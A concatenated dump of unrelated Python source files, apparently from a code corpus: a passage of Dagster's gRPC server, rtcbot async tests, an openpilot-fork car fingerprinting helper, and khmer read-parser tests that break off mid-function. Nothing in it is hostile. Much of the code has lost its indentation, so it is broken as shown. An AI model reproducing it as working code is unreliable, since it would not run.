serializable_error_info = serializable_error_info_from_exc_info(sys.exc_info())
return api_pb2.CancelExecutionReply(
serialized_cancel_execution_result=serialize_dagster_namedtuple(
CancelExecutionResult(
success=success,
message=message,
serializable_error_info=serializable_error_info,
)
)
)
def CanCancelExecution(self, request, _context):
can_cancel_execution_request = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_can_cancel_execution_request),
CanCancelExecutionRequest,
)
with self._execution_lock:
run_id = can_cancel_execution_request.run_id
can_cancel = (
run_id in self._executions and not self._termination_events[run_id].is_set()
)
return api_pb2.CanCancelExecutionReply(
serialized_can_cancel_execution_result=serialize_dagster_namedtuple(
CanCancelExecutionResult(can_cancel=can_cancel)
)
)
def StartRun(self, request, _context):
if self._shutdown_once_executions_finish_event.is_set():
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=False,
message="Tried to start a run on a server after telling it to shut down",
serializable_error_info=None,
)
)
)
try:
execute_run_args = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_execute_run_args),
ExecuteExternalPipelineArgs,
)
run_id = execute_run_args.pipeline_run_id
recon_pipeline = self._recon_pipeline_from_origin(execute_run_args.pipeline_origin)
except:
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=False,
message=None,
serializable_error_info=serializable_error_info_from_exc_info(
sys.exc_info()
),
)
)
)
event_queue = multiprocessing.Queue()
termination_event = multiprocessing.Event()
execution_process = multiprocessing.Process(
target=start_run_in_subprocess,
args=[
request.serialized_execute_run_args,
recon_pipeline,
event_queue,
termination_event,
],
)
with self._execution_lock:
execution_process.start()
self._executions[run_id] = (
execution_process,
execute_run_args.instance_ref,
)
self._termination_events[run_id] = termination_event
success = None
message = None
serializable_error_info = None
while success is None:
sleep(EVENT_QUEUE_POLL_INTERVAL)
# We use `get_nowait()` instead of `get()` so that we can handle the case where the
# execution process has died unexpectedly -- `get()` would hang forever in that case
try:
dagster_event_or_ipc_error_message_or_done = event_queue.get_nowait()
except queue.Empty:
if not execution_process.is_alive():
# subprocess died unexpectedly
success = False
message = (
"GRPC server: Subprocess for {run_id} terminated unexpectedly with "
"exit code {exit_code}".format(
run_id=run_id,
exit_code=execution_process.exitcode,
)
)
serializable_error_info = serializable_error_info_from_exc_info(sys.exc_info())
else:
if isinstance(
dagster_event_or_ipc_error_message_or_done, StartRunInSubprocessSuccessful
):
success = True
elif isinstance(
dagster_event_or_ipc_error_message_or_done, RunInSubprocessComplete
):
continue
if isinstance(dagster_event_or_ipc_error_message_or_done, IPCErrorMessage):
success = False
message = dagster_event_or_ipc_error_message_or_done.message
serializable_error_info = (
dagster_event_or_ipc_error_message_or_done.serializable_error_info
)
# Ensure that if the run failed, we remove it from the executions map before
# returning so that CanCancel will never return True
if not success:
with self._execution_lock:
self._clear_run(run_id)
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=success,
message=message,
serializable_error_info=serializable_error_info,
)
)
)
def _get_current_image(self):
return os.getenv("DAGSTER_CURRENT_IMAGE")
def GetCurrentImage(self, request, _context):
return api_pb2.GetCurrentImageReply(
serialized_current_image=serialize_dagster_namedtuple(
GetCurrentImageResult(
current_image=self._get_current_image(), serializable_error_info=None
)
)
)
@whitelist_for_serdes
class GrpcServerStartedEvent(namedtuple("GrpcServerStartedEvent", "")):
pass
@whitelist_for_serdes
class GrpcServerFailedToBindEvent(namedtuple("GrpcServerFailedToBindEvent", "")):
pass
@whitelist_for_serdes
class GrpcServerLoadErrorEvent(namedtuple("GrpcServerLoadErrorEvent", "error_info")):
def __new__(cls, error_info):
return super(GrpcServerLoadErrorEvent, cls).__new__(
cls,
check.inst_param(error_info, "error_info", SerializableErrorInfo),
)
def server_termination_target(termination_event, server):
termination_event.wait()
# We could make this grace period configurable if we set it in the ShutdownServer handler
server.stop(grace=5)
class DagsterGrpcServer:
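    """Hosts the DagsterApiServicer (plus a standard gRPC health servicer) on a grpc.server
    bound to either a TCP host/port or a Unix domain socket."""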
def __init__(
self,
host="localhost",
port=None,
socket=None,
max_workers=None,
loadable_target_origin=None,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
ipc_output_file=None,
fixed_server_id=None,
):
check.opt_str_param(host, "host")
check.opt_int_param(port, "port")
check.opt_str_param(socket, "socket")
check.opt_int_param(max_workers, "max_workers")
check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
check.invariant(
port is not None if seven.IS_WINDOWS else True,
"You must pass a valid `port` on Windows: `socket` not supported.",
)
check.invariant(
(port or socket) and not (port and socket),
"You must pass one and only one of `port` or `socket`.",
)
check.invariant(
host is not None if port else True,
"Must provide a host when serving on a port",
)
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
self._ipc_output_file = check.opt_str_param(ipc_output_file, "ipc_output_file")
check.opt_str_param(fixed_server_id, "fixed_server_id")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
check.invariant(
max_workers is None or max_workers > 1 if heartbeat else True,
"max_workers must be greater than 1 or set to None if heartbeat is True. "
"If set to None, the server will use the gRPC default.",
)
self.server = grpc.server(
ThreadPoolExecutor(max_workers=max_workers),
compression=grpc.Compression.Gzip,
options=[
("grpc.max_send_message_length", max_send_bytes()),
("grpc.max_receive_message_length", max_rx_bytes()),
],
)
self._server_termination_event = threading.Event()
try:
self._api_servicer = DagsterApiServer(
server_termination_event=self._server_termination_event,
loadable_target_origin=loadable_target_origin,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
lazy_load_user_code=lazy_load_user_code,
fixed_server_id=fixed_server_id,
)
except Exception:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(
GrpcServerLoadErrorEvent(
error_info=serializable_error_info_from_exc_info(sys.exc_info())
)
)
raise
# Create a health check servicer
self._health_servicer = health.HealthServicer()
health_pb2_grpc.add_HealthServicer_to_server(self._health_servicer, self.server)
add_DagsterApiServicer_to_server(self._api_servicer, self.server)
if port:
server_address = host + ":" + str(port)
else:
server_address = "unix:" + os.path.abspath(socket)
# grpc.Server.add_insecure_port returns:
# - 0 on failure
# - port number when a port is successfully bound
# - 1 when a UDS is successfully bound
res = self.server.add_insecure_port(server_address)
if socket and res != 1:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerFailedToBindEvent())
raise CouldNotBindGrpcServerToAddress(socket)
if port and res != port:
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerFailedToBindEvent())
raise CouldNotBindGrpcServerToAddress(port)
def serve(self):
# Unfortunately it looks like ports bind late (here) and so this can fail with an error
# from C++ like:
#
# E0625 08:46:56.180112000 4697443776 server_chttp2.cc:40]
# {"created":"@1593089216.180085000","description":"Only 1 addresses added out of total
# 2 resolved","file":"src/core/ext/transport/chttp2/server/chttp2_server.cc",
# "file_line":406,"referenced_errors":[{"created":"@1593089216.180083000","description":
# "Unable to configure socket","fd":6,"file":
# "src/core/lib/iomgr/tcp_server_utils_posix_common.cc","file_line":217,
# "referenced_errors":[{"created":"@1593089216.180079000",
# "description":"Address already in use","errno":48,"file":
# "src/core/lib/iomgr/tcp_server_utils_posix_common.cc","file_line":190,"os_error":
# "Address already in use","syscall":"bind"}]}]}
#
# This is printed to stdout and there is no return value from server.start or exception
# raised in Python that we can use to handle this. The standard recipes for hijacking C
# stdout (so we could inspect this output and respond accordingly), e.g.
# https://eli.thegreenplace.net/2015/redirecting-all-kinds-of-stdout-in-python/, don't seem
# to work (at least on Mac OS X) against grpc, and in any case would involve a huge
# cross-version and cross-platform maintenance burden. We have an issue open against grpc,
# https://github.com/grpc/grpc/issues/23315, and our own tracking issue at
self.server.start()
# Note: currently this is hardcoded as serving, since both services are cohosted
# pylint: disable=no-member
self._health_servicer.set("DagsterApi", health_pb2.HealthCheckResponse.SERVING)
if self._ipc_output_file:
with ipc_write_stream(self._ipc_output_file) as ipc_stream:
ipc_stream.send(GrpcServerStartedEvent())
server_termination_thread = threading.Thread(
target=server_termination_target,
args=[self._server_termination_event, self.server],
name="grpc-server-termination",
)
server_termination_thread.daemon = True
server_termination_thread.start()
self.server.wait_for_termination()
server_termination_thread.join()
self._api_servicer.cleanup()
class CouldNotStartServerProcess(Exception):
def __init__(self, port=None, socket=None):
super(CouldNotStartServerProcess, self).__init__(
"Could not start server with "
+ (
"port {port}".format(port=port)
if port is not None
else "socket {socket}".format(socket=socket)
)
)
def wait_for_grpc_server(server_process, client, subprocess_args, timeout=60):
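    """Ping the freshly spawned server until it responds, raising if ``timeout`` seconds
    elapse or the server process exits before the first successful ping."""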
start_time = time.time()
last_error = None
while True:
try:
client.ping("")
return
except grpc._channel._InactiveRpcError: # pylint: disable=protected-access
last_error = serializable_error_info_from_exc_info(sys.exc_info())
if time.time() - start_time > timeout:
raise Exception(
f"Timed out waiting for gRPC server to start with arguments: \"{' '.join(subprocess_args)}\". Most recent connection error: {str(last_error)}"
)
        if server_process.poll() is not None:
raise Exception(
f"gRPC server exited with return code {server_process.returncode} while starting up with the command: \"{' '.join(subprocess_args)}\""
)
sleep(0.1)
def open_server_process(
port,
socket,
loadable_target_origin=None,
max_workers=None,
heartbeat=False,
heartbeat_timeout=30,
fixed_server_id=None,
startup_timeout=20,
):
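    """Launch ``python -m dagster.grpc`` in a subprocess with the given options and wait for
    it to answer a ping before returning the process handle."""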
check.invariant((port or socket) and not (port and socket), "Set only port or socket")
check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
check.opt_int_param(max_workers, "max_workers")
from dagster.core.test_utils import get_mocked_system_timezone
mocked_system_timezone = get_mocked_system_timezone()
subprocess_args = (
[
loadable_target_origin.executable_path
if loadable_target_origin and loadable_target_origin.executable_path
else sys.executable,
"-m",
"dagster.grpc",
]
+ ["--lazy-load-user-code"]
+ (["--port", str(port)] if port else [])
+ (["--socket", socket] if socket else [])
+ (["-n", str(max_workers)] if max_workers else [])
+ (["--heartbeat"] if heartbeat else [])
+ (["--heartbeat-timeout", str(heartbeat_timeout)] if heartbeat_timeout else [])
+ (["--fixed-server-id", fixed_server_id] if fixed_server_id else [])
+ (["--override-system-timezone", mocked_system_timezone] if mocked_system_timezone else [])
+ (["--log-level", "WARNING"]) # don't log INFO messages for automatically spun up servers
)
if loadable_target_origin:
subprocess_args += loadable_target_origin.get_cli_args()
server_process = open_ipc_subprocess(subprocess_args)
from dagster.grpc.client import DagsterGrpcClient
client = DagsterGrpcClient(
port=port,
socket=socket,
host="localhost",
)
try:
wait_for_grpc_server(server_process, client, subprocess_args, timeout=startup_timeout)
except:
if server_process.poll() is None:
server_process.terminate()
raise
return server_process
def open_server_process_on_dynamic_port(
max_retries=10,
loadable_target_origin=None,
max_workers=None,
heartbeat=False,
heartbeat_timeout=30,
fixed_server_id=None,
startup_timeout=20,
):
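    """Pick a free port and try to start a server on it, retrying with a new port (up to
    ``max_retries`` times) when the bind fails; returns a (server_process, port) tuple."""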
server_process = None
retries = 0
while server_process is None and retries < max_retries:
port = find_free_port()
try:
server_process = open_server_process(
port=port,
socket=None,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
fixed_server_id=fixed_server_id,
startup_timeout=startup_timeout,
)
except CouldNotBindGrpcServerToAddress:
pass
retries += 1
return server_process, port
class GrpcServerProcess:
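    """Spawns a dagster gRPC server subprocess, using a Unix domain socket by default and
    falling back to a dynamically assigned TCP port on Windows or when ``force_port`` is set."""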
def __init__(
self,
loadable_target_origin=None,
force_port=False,
max_retries=10,
max_workers=None,
heartbeat=False,
heartbeat_timeout=30,
fixed_server_id=None,
startup_timeout=20,
):
self.port = None
self.socket = None
self.server_process = None
self.loadable_target_origin = check.opt_inst_param(
loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin
)
check.bool_param(force_port, "force_port")
check.int_param(max_retries, "max_retries")
check.opt_int_param(max_workers, "max_workers")
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
check.opt_str_param(fixed_server_id, "fixed_server_id")
check.int_param(startup_timeout, "startup_timeout")
check.invariant(
max_workers is None or max_workers > 1 if heartbeat else True,
"max_workers must be greater than 1 or set to None if heartbeat is True. "
"If set to None, the server will use the gRPC default.",
)
if seven.IS_WINDOWS or force_port:
self.server_process, self.port = open_server_process_on_dynamic_port(
max_retries=max_retries,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
fixed_server_id=fixed_server_id,
startup_timeout=startup_timeout,
)
else:
self.socket = safe_tempfile_path_unmanaged()
self.server_process = open_server_process(
port=None,
socket=self.socket,
loadable_target_origin=loadable_target_origin,
max_workers=max_workers,
heartbeat=heartbeat,
heartbeat_timeout=heartbeat_timeout,
fixed_server_id=fixed_server_id,
startup_timeout=startup_timeout,
)
if self.server_process is None:
raise CouldNotStartServerProcess(port=self.port, socket=self.socket)
@property
def pid(self):
return self.server_process.pid
def wait(self, timeout=30):
if self.server_process.poll() is None:
seven.wait_for_process(self.server_process, timeout=timeout)
def create_ephemeral_client(self):
from dagster.grpc.client import EphemeralDagsterGrpcClient
return EphemeralDagsterGrpcClient(
port=self.port, socket=self.socket, server_process=self.server_process
)
|
test_base.py
|
import asyncio
import aiounittest
import threading
import time
from rtcbot.base import (
SubscriptionConsumer,
SubscriptionProducer,
ThreadedSubscriptionConsumer,
ThreadedSubscriptionProducer,
)
class TestBaseClasses(aiounittest.AsyncTestCase):
async def test_SubscriptionConsumer(self):
c = SubscriptionConsumer(asyncio.Queue)
c.put_nowait("test")
self.assertEqual(await c.get(), "test")
q = asyncio.Queue()
q.put_nowait("yay")
c.putSubscription(q)
self.assertEqual(await c.get(), "yay")
# Now test cancellation - the current subscription is q.
# we will switch to the default one
getTask = asyncio.create_task(c.get())
# Give time for the task to start
await asyncio.sleep(0.01)
c.put_nowait("Hi!")
await getTask
self.assertEqual(getTask.result(), "Hi!")
c.put_nowait("Yo!")
c.close()
async def test_SubscriptionProducer(self):
p = SubscriptionProducer(asyncio.Queue, defaultAutosubscribe=True)
# Nothing subscribed
p.put_nowait("1")
# DefaultAutosubscribe subscribes default during creation
self.assertEqual(await p.get(), "1")
q1 = p.subscribe()
q2 = p.subscribe()
p.put_nowait("2")
self.assertEqual(await p.get(), "2")
self.assertEqual(await q1.get(), "2")
self.assertEqual(await q2.get(), "2")
# Unsubscribe should stop it receiving updates
p.unsubscribe(q2)
p.put_nowait("3")
q2.put_nowait(12)
self.assertEqual(await p.get(), "3")
self.assertEqual(await q1.get(), "3")
self.assertEqual(await q2.get(), 12)
p.unsubscribe()
p.put_nowait("4")
# The default is recreated here
getTask = asyncio.create_task(p.get())
# Give time for the task to start
await asyncio.sleep(0.01)
p.put_nowait("5")
await getTask
self.assertEqual(getTask.result(), "5")
self.assertEqual(await q1.get(), "4")
self.assertEqual(await q1.get(), "5")
p.unsubscribeAll()
p.put_nowait("6")
q1.put_nowait(8)
self.assertEqual(await q1.get(), 8)
p.unsubscribe()
p.unsubscribe()
p.close()
class TestThreadedClasses(aiounittest.AsyncTestCase):
async def test_ThreadedConsumer(self):
c = ThreadedSubscriptionConsumer()
c.put_nowait("test")
await c.onReady()
self.assertEqual(c.ready, True)
# Have to sleep to give asyncio time to prepare the data
await asyncio.sleep(0.1)
self.assertEqual(c.testQueue.get(), "test")
# Now we test switching between subscriptions
q = asyncio.Queue()
q.put_nowait("heyy")
c.putSubscription(q)
await asyncio.sleep(0.01)
self.assertEqual(c.testQueue.get(), "heyy")
        # Switch back to the default
c.put_nowait("yeehaw")
await asyncio.sleep(0.01)
self.assertEqual(c.testQueue.get(), "yeehaw")
        # wait 10 seconds to make sure the "no incoming data" code path runs  #codeCoverage
await asyncio.sleep(10)
c.close()
await asyncio.sleep(0.01)
self.assertEqual(c.ready, False)
self.assertEqual(c.testQueue.get(), "<<END>>")
async def test_ThreadedProducer(self):
p = ThreadedSubscriptionProducer()
await p.onReady()
self.assertEqual(p.ready, True)
p.testQueue.put("test1")
self.assertEqual(await p.get(), "test1")
def pushsleep():
            # Work around the lack of a timeout when testing p
time.sleep(0.1)
p.testQueue.put("Ending")
        threading.Thread(target=pushsleep).start()
p.close()
await asyncio.sleep(0.01)
self.assertEqual(p.ready, False)
self.assertEqual(p.testResultQueue.get(), "<<END>>")
|
car_helpers.py
|
import os
import threading
import json
import requests
from common.params import Params
from common.basedir import BASEDIR
from selfdrive.car.fingerprints import eliminate_incompatible_cars, all_known_cars
from selfdrive.car.vin import get_vin, VIN_UNKNOWN
from selfdrive.car.fw_versions import get_fw_versions, match_fw_to_car
from selfdrive.swaglog import cloudlog
import cereal.messaging as messaging
import selfdrive.crash as crash
from selfdrive.car import gen_empty_fingerprint
from common.travis_checker import travis
from common.op_params import opParams
op_params = opParams()
use_car_caching = op_params.get('use_car_caching', True)
from cereal import car
def get_startup_alert(car_recognized, controller_available):
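  """Pick the startup alert: 'startupMaster' on non-release branches of the arne182 fork,
  overridden by 'startupNoCar' or 'startupNoControl' when the car or controller is missing."""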
alert = 'startup'
if Params().get("GitRemote", encoding="utf8") in ['git@github.com:arne182/openpilot.git', 'https://github.com/arne182/openpilot.git']:
if Params().get("GitBranch", encoding="utf8") not in ['release2', 'release3', 'release4', 'release5', 'release6']:
alert = 'startupMaster'
if not car_recognized:
alert = 'startupNoCar'
elif car_recognized and not controller_available:
alert = 'startupNoControl'
return alert
def load_interfaces(brand_names):
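  """Import each brand's CarInterface (and CarState/CarController when present) and map every
  model name of that brand to its (CarInterface, CarController, CarState) tuple."""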
ret = {}
for brand_name in brand_names:
path = ('selfdrive.car.%s' % brand_name)
CarInterface = __import__(path + '.interface', fromlist=['CarInterface']).CarInterface
if os.path.exists(BASEDIR + '/' + path.replace('.', '/') + '/carstate.py'):
CarState = __import__(path + '.carstate', fromlist=['CarState']).CarState
else:
CarState = None
if os.path.exists(BASEDIR + '/' + path.replace('.', '/') + '/carcontroller.py'):
CarController = __import__(path + '.carcontroller', fromlist=['CarController']).CarController
else:
CarController = None
for model_name in brand_names[brand_name]:
ret[model_name] = (CarInterface, CarController, CarState)
return ret
def _get_interface_names():
# read all the folders in selfdrive/car and return a dict where:
  # - keys are all the car brands for which we have an interface
  # - values are lists of specific car models for a given brand
brand_names = {}
for car_folder in [x[0] for x in os.walk(BASEDIR + '/selfdrive/car')]:
try:
brand_name = car_folder.split('/')[-1]
model_names = __import__('selfdrive.car.%s.values' % brand_name, fromlist=['CAR']).CAR
model_names = [getattr(model_names, c) for c in model_names.__dict__.keys() if not c.startswith("__")]
brand_names[brand_name] = model_names
except (ImportError, IOError):
pass
return brand_names
# imports from directory selfdrive/car/<name>/
interface_names = _get_interface_names()
interfaces = load_interfaces(interface_names)
def only_toyota_left(candidate_cars):
return all(("TOYOTA" in c or "LEXUS" in c) for c in candidate_cars) and len(candidate_cars) > 0
# **** for use live only ****
def fingerprint(logcan, sendcan, has_relay):
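  """Identify the car by matching CAN messages against known fingerprints, short-circuiting
  with a cached fingerprint when available and overriding the result with a unique FW-version
  match or the FINGERPRINT environment variable when set."""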
params = Params()
car_params = params.get("CarParams")
if not travis:
cached_fingerprint = params.get('CachedFingerprint')
else:
cached_fingerprint = None
if car_params is not None:
car_params = car.CarParams.from_bytes(car_params)
if has_relay:
    # VIN query only reliably works through OBDII
bus = 1
cached_params = Params().get("CarParamsCache")
if cached_params is not None:
cached_params = car.CarParams.from_bytes(cached_params)
if cached_params.carName == "mock":
cached_params = None
    if cached_params is not None and len(cached_params.carFw) > 0 and cached_params.carVin != VIN_UNKNOWN:
cloudlog.warning("Using cached CarParams")
vin = cached_params.carVin
car_fw = list(cached_params.carFw)
else:
cloudlog.warning("Getting VIN & FW versions")
_, vin = get_vin(logcan, sendcan, bus)
car_fw = get_fw_versions(logcan, sendcan, bus)
fw_candidates = match_fw_to_car(car_fw)
else:
vin = VIN_UNKNOWN
fw_candidates, car_fw = set(), []
cloudlog.warning("VIN %s", vin)
Params().put("CarVin", vin)
finger = gen_empty_fingerprint()
candidate_cars = {i: all_known_cars() for i in [0, 1]} # attempt fingerprint on both bus 0 and 1
frame = 0
frame_fingerprint = 10 # 0.1s
car_fingerprint = None
done = False
if cached_fingerprint is not None and use_car_caching: # if we previously identified a car and fingerprint and user hasn't disabled caching
cached_fingerprint = json.loads(cached_fingerprint)
    if len(cached_fingerprint) < 3 or cached_fingerprint[0] is None:
params.delete('CachedFingerprint')
else:
finger[0] = {int(key): value for key, value in cached_fingerprint[2].items()}
source = car.CarParams.FingerprintSource.can
return (str(cached_fingerprint[0]), finger, vin, car_fw, cached_fingerprint[1])
while not done:
a = messaging.get_one_can(logcan)
for can in a.can:
# need to independently try to fingerprint both bus 0 and 1 to work
# for the combo black_panda and honda_bosch. Ignore extended messages
# and VIN query response.
# Include bus 2 for toyotas to disambiguate cars using camera messages
# (ideally should be done for all cars but we can't for Honda Bosch)
if can.src in range(0, 4):
finger[can.src][can.address] = len(can.dat)
for b in candidate_cars:
if (can.src == b or (only_toyota_left(candidate_cars[b]) and can.src == 2)) and \
can.address < 0x800 and can.address not in [0x7df, 0x7e0, 0x7e8]:
candidate_cars[b] = eliminate_incompatible_cars(can, candidate_cars[b])
# if we only have one car choice and the time since we got our first
# message has elapsed, exit
for b in candidate_cars:
# Toyota needs higher time to fingerprint, since DSU does not broadcast immediately
if only_toyota_left(candidate_cars[b]):
frame_fingerprint = 100 # 1s
if len(candidate_cars[b]) == 1:
if frame > frame_fingerprint:
# fingerprint done
car_fingerprint = candidate_cars[b][0]
elif len(candidate_cars[b]) < 4: # For the RAV4 2019 and Corolla 2020 LE Fingerprint problem
if frame > 180:
if any(("TOYOTA COROLLA TSS2 2019" in c) for c in candidate_cars[b]):
car_fingerprint = "TOYOTA COROLLA TSS2 2019"
# bail if no cars left or we've been waiting for more than 2s
failed = all(len(cc) == 0 for cc in candidate_cars.values()) or frame > 200
succeeded = car_fingerprint is not None
done = failed or succeeded
frame += 1
source = car.CarParams.FingerprintSource.can
# If FW query returns exactly 1 candidate, use it
if len(fw_candidates) == 1:
car_fingerprint = list(fw_candidates)[0]
source = car.CarParams.FingerprintSource.fw
fixed_fingerprint = os.environ.get('FINGERPRINT', "")
if len(fixed_fingerprint):
car_fingerprint = fixed_fingerprint
source = car.CarParams.FingerprintSource.fixed
cloudlog.warning("fingerprinted %s", car_fingerprint)
params.put("CachedFingerprint", json.dumps([car_fingerprint, source, {int(key): value for key, value in finger[0].items()}]))
return car_fingerprint, finger, vin, car_fw, source
def is_connected_to_internet(timeout=5):
try:
requests.get("https://sentry.io", timeout=timeout)
return True
  except requests.RequestException:
    return False
def crash_log(candidate):
while True:
if is_connected_to_internet():
crash.capture_warning("fingerprinted %s" % candidate)
break
def crash_log2(fingerprints, fw):
while True:
if is_connected_to_internet():
crash.capture_warning("car doesn't match any fingerprints: %s" % fingerprints)
crash.capture_warning("car doesn't match any fw: %s" % fw)
break
def get_car(logcan, sendcan, has_relay=False):
candidate, fingerprints, vin, car_fw, source = fingerprint(logcan, sendcan, has_relay)
if candidate is None:
if not travis:
y = threading.Thread(target=crash_log2, args=(fingerprints,car_fw,))
y.start()
cloudlog.warning("car doesn't match any fingerprints: %r", fingerprints)
candidate = "mock"
if not travis:
x = threading.Thread(target=crash_log, args=(candidate,))
x.start()
CarInterface, CarController, CarState = interfaces[candidate]
car_params = CarInterface.get_params(candidate, fingerprints, has_relay, car_fw)
car_params.carVin = vin
car_params.carFw = car_fw
car_params.fingerprintSource = source
return CarInterface(car_params, CarController, CarState), car_params
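# Hedged usage sketch (not part of the original module): get_car() is normally called
# from the car daemon with live messaging sockets; the service names below follow the
# usual openpilot conventions but are assumptions here.
def _get_car_example():
  logcan = messaging.sub_sock('can')
  sendcan = messaging.pub_sock('sendcan')
  car_interface, car_params = get_car(logcan, sendcan, has_relay=False)
  cloudlog.info("selected interface for %s", car_params.carFingerprint)
  return car_interface, car_params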
|
test_read_parsers.py
|
# This file is part of khmer, https://github.com/dib-lab/khmer/, and is
# Copyright (C) 2013-2015, Michigan State University.
# Copyright (C) 2015-2016, The Regents of the University of California.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * Neither the name of the Michigan State University nor the names
# of its contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Contact: khmer-project@idyll.org
# pylint: disable=missing-docstring,invalid-name
# Tests for the ReadParser and Read classes.
from __future__ import print_function
from __future__ import absolute_import
from khmer import ReadParser
from . import khmer_tst_utils as utils
import pytest
from functools import reduce # pylint: disable=redefined-builtin
def test_read_properties():
# Note: Using a data file with only one read.
rparser = ReadParser(utils.get_test_data("single-read.fq"))
    # Check the properties of the one read in the data set.
for read in rparser:
assert read.name == "895:1:1:1246:14654 1:N:0:NNNNN"
assert read.sequence == "CAGGCGCCCACCACCGTGCCCTCCAACCTGATGGT"
assert read.annotations == ""
assert read.quality == """][aaX__aa[`ZUZ[NONNFNNNNNO_____^RQ_"""
def test_with_default_arguments():
read_names = []
# Note: Using a data file where read names are just integers on [0,99).
rparser = ReadParser(utils.get_test_data("random-20-a.fa"))
for read in rparser:
read_names.append(int(read.name))
# "Derandomize".
read_names.sort()
# Each read number should match the corresponding name.
for m, n in enumerate(read_names):
assert m == n
def test_num_reads():
"""Test ReadParser.num_reads"""
reads_count = 0
rparser = ReadParser(utils.get_test_data("100-reads.fq.gz"))
for _ in rparser:
reads_count += 1
assert reads_count == 100
assert rparser.num_reads == 100
@pytest.mark.multithread
def test_num_reads_threads():
"""Test threadsaftey of ReadParser's read counting"""
import threading
def count_reads(rparser):
for _ in rparser:
pass
n_threads = 4
threads = []
rparser = ReadParser(utils.get_test_data("100-reads.fq.gz"))
for _ in range(n_threads):
thr = threading.Thread(target=count_reads, args=[rparser, ])
threads.append(thr)
thr.start()
for thr in threads:
thr.join()
assert rparser.num_reads == 100
def test_num_reads_truncated():
n_reads = 0
rparser = ReadParser(utils.get_test_data("truncated.fq"))
try:
for _ in rparser:
n_reads += 1
except ValueError as err:
assert "Sequence is empty" in str(err), str(err)
assert rparser.num_reads == 1, "%d valid reads in file, got %d" % (
n_reads, rparser.num_reads)
def test_gzip_decompression():
reads_count = 0
rparser = ReadParser(utils.get_test_data("100-reads.fq.gz"))
for _ in rparser:
reads_count += 1
assert 100 == reads_count
def test_gzip_decompression_truncated():
rparser = ReadParser(utils.get_test_data("100-reads.fq.truncated.gz"))
try:
for _ in rparser:
pass
assert 0, "this should fail"
except OSError as err:
print(str(err))
def test_gzip_decompression_truncated_pairiter():
rparser = ReadParser(utils.get_test_data("100-reads.fq.truncated.gz"))
try:
for _ in rparser.iter_read_pairs():
pass
assert 0, "this should fail"
except OSError as err:
print(str(err))
except ValueError as err:
print(str(err))
def test_bzip2_decompression():
reads_count = 0
rparser = ReadParser(utils.get_test_data("100-reads.fq.bz2"))
for _ in rparser:
reads_count += 1
assert 100 == reads_count
def test_bzip2_decompression_truncated():
rparser = ReadParser(utils.get_test_data("100-reads.fq.truncated.bz2"))
try:
for _ in rparser:
pass
assert 0, "this should fail"
except OSError as err:
print(str(err))
except ValueError as err:
print(str(err))
def test_bzip2_decompression_truncated_pairiter():
rparser = ReadParser(utils.get_test_data("100-reads.fq.truncated.bz2"))
try:
for _ in rparser.iter_read_pairs():
pass
assert 0, "this should fail"
except OSError as err:
print(str(err))
except ValueError as err:
print(str(err))
def test_badbzip2():
try:
rparser = ReadParser(utils.get_test_data("test-empty.fa.bz2"))
for _ in rparser:
pass
assert 0, "this should fail"
except OSError as err:
print(str(err))
except ValueError as err:
print(str(err))
@pytest.mark.multithread
def test_with_multiple_threads(testfile="test-reads.fq.bz2"):
import operator
import threading
reads_count_1thr = 0
rparser = ReadParser(utils.get_test_data(testfile))
for _ in rparser:
reads_count_1thr += 1
def count_reads(rparser, counters, tnum):
counters[tnum] = reduce(operator.add, (1 for read in rparser))
N_THREADS = 4
threads = []
reads_counts_per_thread = [0] * N_THREADS
rparser = ReadParser(utils.get_test_data(testfile))
for tnum in range(N_THREADS):
t = \
threading.Thread(
target=count_reads,
